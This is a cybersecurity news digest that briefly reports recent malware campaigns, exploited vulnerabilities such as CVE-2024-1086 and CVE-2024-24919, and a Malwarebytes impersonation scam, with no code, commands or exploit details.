In a recent wave of cyber incidents, attackers remotely disabled over 600,000 SOHO routers with the Chalubo RAT, requiring hardware replacements. Concurrently, the CISA has flagged a critical Linux kernel vulnerability (CVE-2024-1086) for urgent patching due to active exploitation. Meanwhile, Check Point's network gateways face scrutiny over a new flaw (CVE-2024-24919). Both of these vulnerabilities were added to the KEV Catalog.

Adding to these challenges, cybercriminals are leveraging fake browser updates to disseminate two malware strains, BitRAT and Lumma Stealer, that compromise systems and steal data.

Top Malware Reported in the Last 24 Hours

Pumpkin Eclipse assault uncovered

Unknown attackers remotely bricked over 600,000 SOHO routers belonging to a single ISP and deployed the Chalubo RAT, rendering the devices permanently inoperable and requiring hardware replacement. The targeted router models were ActionTec's T3200 and T3260, but it's unclear how the attackers gained access, as no known vulnerabilities were found for these models. Named Pumpkin Eclipse, the attack does not appear to be linked to any known nation-state activity.

MS Office cracks deliver malware cocktail

Cybercriminals are using cracked versions of Microsoft Office, Windows, and Hangul Word Processor to distribute a malware cocktail to unsuspecting users. The malicious installer has a well-crafted interface that allows users to select the version and language, but it launches obfuscated .NET malware in the background. The malware contacts Telegram or Mastodon channels to receive a valid download URL, often from Google Drive or GitHub, to fetch additional malware components such as Orcus RAT, XMRig, 3Proxy, PureCrypter, and AntiAV.

FlyingYeti drops COOKBOX malware

Cloudflare disrupted a month-long phishing campaign by the Russia-aligned threat actor FlyingYeti targeting Ukraine, using debt-themed lures to deliver a PowerShell malware known as COOKBOX. The phishing campaign used Cloudflare Workers and GitHub, while exploiting a WinRAR vulnerability to deliver the malware, primarily against Ukrainian military entities. Once installed, the COOKBOX variant makes requests to a DDNS domain for command-and-control, awaiting PowerShell cmdlets to be executed.

Fake browser updates deliver malware

eSentire’s TRU uncovered a sophisticated malware campaign involving fake browser updates that deliver two dangerous malware variants, BitRAT and Lumma Stealer, which can steal sensitive data and compromise systems. The attack starts with a malicious JavaScript code injected into a webpage that redirects the user to a fake update page. The fake update page hosts a ZIP archive called 'Update.zip' that contains malicious files to download and execute the payloads.

Top Vulnerabilities Reported in the Last 24 Hours

CISA adds two new bugs to KEV Catalog

The CISA has added a high-severity vulnerability in the Linux kernel's netfilter component (CVE-2024-1086) to its Known Exploited Vulnerabilities (KEV) Catalog, warning federal agencies to patch it by June 20, due to evidence of active exploitation. CVE-2024-1086 is a use-after-free vulnerability that allows local privilege escalation from a regular user to root and potentially arbitrary code execution. The other flaw, CVE-2024-24919, has been newly disclosed in Check Point’s network gateway security products. It allows an attacker to read sensitive information on internet-connected gateways with remote access VPN or mobile access enabled.

Critical WordPress Plugin Vulnerabilities

Vulnerabilities in three popular WordPress plugins are being exploited to inject malicious scripts and backdoors, allowing attackers to create new administrator accounts and monitor infected websites. The exploited bugs include unauthenticated stored cross-site scripting (XSS) vulnerabilities in the WP Statistics (CVE-2024-2194), WP Meta SEO (CVE-2023-6961), and LiteSpeed Cache (CVE-2023-40000) plugins, impacting a significant number of active installations.

RedTail cryptominer exploits PAN-OS bug

The RedTail cryptocurrency miner has evolved to exploit a critical vulnerability (CVE-2024-3400) in Palo Alto Networks firewalls, showcasing new anti-analysis techniques and the use of private mining pools. The malware spreads through multiple propagation mechanisms, targeting vulnerabilities in various systems such as TP-Link routers, ThinkPHP, and VMWare Workspace ONE Access and Identity Manager. The latest version of RedTail includes encrypted mining configurations to launch the embedded XMRig miner.

Top Scams Reported in the Last 24 Hours

Scammers impersonate Malwarebytes

Malwarebytes warned users about scammers impersonating their brand to spread info-stealers. The fake websites offer malicious downloads that steal sensitive information from victims' devices. Scammers also use other tactics, such as selling illegal copies of Malwarebytes or sending phishing emails. The company advised users to download their software directly from the official website and be wary of any suspicious emails or websites claiming to be from the company.